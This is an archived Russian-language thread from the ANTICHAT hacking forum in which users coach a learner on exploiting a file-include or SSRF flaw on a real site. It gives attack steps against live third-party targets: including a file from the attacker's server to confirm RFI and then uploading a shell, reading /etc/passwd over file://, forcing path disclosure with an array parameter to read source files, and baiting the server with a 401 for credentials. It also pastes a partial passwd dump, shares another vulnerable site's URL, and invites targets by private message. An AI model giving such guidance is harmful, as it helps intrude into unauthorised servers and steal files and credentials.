ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

12.10.2016, 12:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 97867
Репутация:
52
|
|
Сообщение от sinfo
sinfo said:
↑
Такая трабла есть инклуд.Похож на RFI.Допустим перехожу site.com/blablabla=
http://hack.ru/phpinfo.php
открывает пхп инфо моего сайта(hack).
Просто залей на hack.ru файл phpcode.txt с содержимым и открой в браузере site.com/blablabla=phpcode.txt . Если в странице будет присутствовать только "okay dude" то значит это реально рабочий RFI и осталось только залить шелл. Если в страницу будет тупо включено содержимое phpcode.txt вместе с тегами
|
|
|
|

12.10.2016, 13:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 2726
Репутация:
2
|
|
На самом деле больше похоже на XSRF. Т.е. сервер site.com получает URL, идет по нему, забирает контент и отдает его уже тебе.
посмотри в логах своего веб сервера на hack.com с каким юзер-агентом он приходит к тебе. можно попробовать в ответ на запрос ему отдать 401-й код - вдруг прилетят авторизационные данные. Если бы была винда - смог бы отрелеиться.
|
|
|
|

12.10.2016, 14:09
|
|
Guest
Сообщений: n/a
Провел на форуме: 4811
Репутация:
0
|
|
file:///etc/passwd да вот только что нашел,ток в другом месте,это у же другой запрос(пост).Вот etcpasswd нашел.Подскажите что делать дальше
|
|
|
|

12.10.2016, 14:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от sinfo
sinfo said:
↑
file:///etc/passwd да вот только что нашел,ток в другом месте,это у же другой запрос(пост).Вот etcpasswd нашел.Подскажите что делать дальше
ищите логи, конфиги. На самом деле я лично не одну такую уязвимость не нашёл, только в тасках. Лучше сайт выкладывайте, там может быть не includ, с как сказали раньше ссрф, а может ещё что-то
|
|
|
|

12.10.2016, 14:53
|
|
Guest
Сообщений: n/a
Провел на форуме: 300820
Репутация:
90
|
|
Сообщение от BabaDook
BabaDook said:
↑
ищите логи, конфиги. На самом деле я лично не одну такую уязвимость не нашёл, только в тасках. Лучше сайт выкладывайте, там может быть не includ, с как сказали раньше ссрф, а может ещё что-то
вот вот("и зачем читать passwd когда у него RFI?")
тс как бы учится, и хер знает rfi там или lfi, или вообще fopen или file_get_contents
"На самом деле я лично не одну такую уязвимость не нашёл, только в тасках"
да ладно, вчера такую нашел, просто искать надо правда там не lfi а чтение файлов через fopen, но всё же
тс, ошибки php на сайт выводятся? если да надо узнать докрут до сайта(или каким нибудь другим способом) и первым делом прочитать уязвимый скрипт
|
|
|
|

12.10.2016, 14:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от t0ma5
t0ma5 said:
↑
вот вот("и зачем читать passwd когда у него RFI?")
тс как бы учится, и хер знает rfi там или lfi, или вообще fopen или file_get_contents
"На самом деле я лично не одну такую уязвимость не нашёл, только в тасках"
да ладно, вчера такую нашел, просто искать надо
правда там не lfi а чтение файлов через fopen, но всё же
тс, ошибки php на сайт выводятся? если да надо узнать докрут до сайта(или каким нибудь другим способом) и первым делом прочитать уязвимый скрипт
Я вообще уже давно ничего не ищу, захожу на форум, а тут уже найдено, бери,, да пробуй раскрутить ))) Сцука, я ленивый.
|
|
|
|

12.10.2016, 15:07
|
|
Guest
Сообщений: n/a
Провел на форуме: 300820
Репутация:
90
|
|
Сообщение от BabaDook
BabaDook said:
↑
Я вообще уже давно ничего не ищу, захожу на форум, а тут уже найдено, бери,, да пробуй раскрутить ))) Сцука, я ленивый.
нуу лень она двигатель типа))
http://dantant.com/proxy/miniProxy.p...://google.com/
для примера, прокся типа, хотя по факту читалка файлов сам ещё толком не крутил, там какая то свалка на домене)
|
|
|
|

12.10.2016, 15:26
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Живого места на том сайте нету, инклуд нашёл, и заливку файлов, но версия пхп высокая
И много таких прикольных моментов. Но почему я только сейчас стал обращать на это внимания
п.с спасибо за сыль, будет чем заняться на досуге
|
|
|
|

13.10.2016, 15:36
|
|
Guest
Сообщений: n/a
Провел на форуме: 187765
Репутация:
154
|
|
Кидай таргет в ЛС.
|
|
|
|

14.10.2016, 01:15
|
|
Guest
Сообщений: n/a
Провел на форуме: 24770
Репутация:
2
|
|
Сообщение от sinfo
sinfo said:
↑
file:///etc/passwd да вот только что нашел,ток в другом месте
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
/etc/group
crontab:x:102:
Debian-exim:x:103:
mlocate:x:104:
ssh:x:105:
А есть брут??работающий с post запросами?
Значит смотри, если у тебя получилось прочитать локальный файл, ищи раскрытие путей например
пост в авторизации
site.com/login
post data
login[]=lol
дает нам /var/www/site.com/public_html/lol/db.php error 31 line
тогда мы имеем следующую возможность чтения
file:///var/www/site.com/public_html/index.php
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|